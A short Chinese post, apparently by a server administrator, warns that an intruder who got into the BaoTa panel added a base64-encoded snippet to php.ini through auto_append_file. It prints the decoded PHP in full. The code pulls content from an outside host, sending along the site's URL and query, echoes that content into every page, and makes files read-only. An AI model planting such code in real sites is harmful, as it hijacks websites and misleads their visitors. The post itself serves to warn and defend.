服务器PHP配置文件php.ini被非法篡改链接到假的天极网页面

服务器宝塔密码不知道如何被人知道了，后查是香港的IP地址，此人登录宝塔后，多次修改了每个版本的PHP，将配置文件php.ini文件中，用auto_append_file，添加了base64加密的php编程语句，

后解密后，密文如下：

set_time_limit(0);

header("Content-type: text/html; charset=utf-8");

date_default_timezone_set('PRC');

$TD_server = "http://z8qw.woshinidie66.com/";

$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];

$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;

$url1 = $_SERVER['PHP_SELF'];

$filename1 = @end(explode('/',$url1));

function set_writeable($file_name)

{

@chmod($file_name,0444);

}

set_writeable($filename1);

?>

这人有点损。不地道。希望给其他人遇到这种情况的，提个醒，打开任何php文件，都会在底部加入这段代码，跳到他想去的非法页面地址。